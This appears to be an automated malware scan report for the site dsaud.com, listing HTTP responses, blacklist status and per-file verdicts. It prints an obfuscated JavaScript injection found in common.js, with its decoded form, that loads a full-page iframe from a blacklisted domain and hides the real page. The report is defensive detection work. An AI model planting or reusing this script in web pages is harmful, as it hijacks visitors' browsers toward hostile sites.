Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=dsaud.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://dsaud.com/ | HTTP/1.1 200 OK Date: Wed, 25 Feb 2015 01:46:19 GMT Accept-Ranges: bytes ETag: "a5942cc8404cd01:4430" Server: Microsoft-IIS/6.0 Content-Length: 19629 Content-Location: http://dsaud.com/index.html Content-Type: text/html Last-Modified: Thu, 19 Feb 2015 12:37:11 GMT X-Powered-By: ASP.NET | clean |
http://dsaud.com/index.html | 200 OK Content-Length: 19629 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.goldoj.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <title>´óÔ²ÒøÌ©·Ö¹«Ë¾|´óÔ²ÒøÌ©ÍøÕ¾-´óÔ²ÒøÌ©</title> <meta name="description" content="´óÔ²ÒøÌ©·Ö¹«Ë¾£¿ÎÒÃÇÌṩ¹ØÓÚ´óÔ²ÒøÌ©ÍøÕ¾µÄÐÅÏ¢ÒÔ¼°¹ØÓÚ´óÔ²ÒøÌ© ...[4386 bytes skipped]... | ||
http://www.dsaud.com/common.js | 200 OK Content-Length: 782 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: www.shdyyt.com var ss = '<center id="showcloneshengxiaon"><ifr'+'ame scrolling="no" marginheight=0 marginwidth=0 frameborder="0" width="100%" width="14'+'00" height="22'+'05" src="ht'+'tp://'+'ww'+'w.s'+'hdy'+'yt.c'+'om/"></iframe></center>';
eval("do"+"cu"+"ment.wr"+"ite('"+ss+"');"); try{ setInterval(function(){ try{ document.getElementById("div"+"All").style.display="no"+"ne"; }catch(e){} for(var i=0;i<document.body.children.length;i++){ try{ var tagname = document.body.children[i].tagName; var myid = document.body.children[i].id; if(myid!="iconDiv1" && myid!="showcloneshengxiaon"){ document.body.children[i].style.display="non"+"e"; } }catch(e){} } },100); }catch(e){} Decoded script: document.write('<center id="showcloneshengxiaon"><iframe scrolling="no" marginheight=0 marginwidth=0 frameborder="0" width="100%" width="1400" height="2205" src="http://www.shdyyt.com/"></iframe></center>'); document.write('<center id="showcloneshengxiaon"><iframe scrolling="no" marginheight=0 marginwidth=0 frameborder="0" width="100%" width="1400" height="2205" src="http://www.shdyyt.com/"></iframe></center>'); function () { try { document.getElementById("divAll").style.display = "none"; } catch (e) { } for (var i = 0; i < d ...[1233 bytes skipped]... | ||
http://www.dsaud.com/tj.js | 200 OK Content-Length: 122 Content-Type: application/x-javascript | clean |
http://dsaud.com/test404page.js | HTTP/1.1 200 OK Date: Wed, 25 Feb 2015 01:46:26 GMT Accept-Ranges: bytes ETag: "e23d621417d7cf1:4430" Server: Microsoft-IIS/6.0 Content-Length: 1372 Content-Location: http://dsaud.com/404.html?404;http://dsaud.com:80/test404page.js Content-Type: text/html Last-Modified: Tue, 23 Sep 2014 10:13:54 GMT X-Powered-By: ASP.NET | clean |
http://dsaud.com/404.html?404;http://dsaud.com:80/test404page.js | 200 OK Content-Length: 1372 Content-Type: text/html | clean |
http://www.qq.com/404/search_children.js | 200 OK Content-Length: 295 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: dsaud.com
Result:
HTTP/1.1 200 OK
Date: Wed, 25 Feb 2015 01:46:19 GMT
Accept-Ranges: bytes
ETag: "a5942cc8404cd01:4430"
Server: Microsoft-IIS/6.0
Content-Length: 19629
Content-Location: http://dsaud.com/index.html
Content-Type: text/html
Last-Modified: Thu, 19 Feb 2015 12:37:11 GMT
X-Powered-By: ASP.NET
...19629 bytes of data.
GET / HTTP/1.1
Host: dsaud.com
Result:
HTTP/1.1 200 OK
Date: Wed, 25 Feb 2015 01:46:19 GMT
Accept-Ranges: bytes
ETag: "a5942cc8404cd01:4430"
Server: Microsoft-IIS/6.0
Content-Length: 19629
Content-Location: http://dsaud.com/index.html
Content-Type: text/html
Last-Modified: Thu, 19 Feb 2015 12:37:11 GMT
X-Powered-By: ASP.NET
...19629 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: dsaud.com
Referer: http://www.google.com/search?q=dsaud.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: dsaud.com
Referer: http://www.google.com/search?q=dsaud.com
Result:
The result is similar to the first query. There are no suspicious redirects found.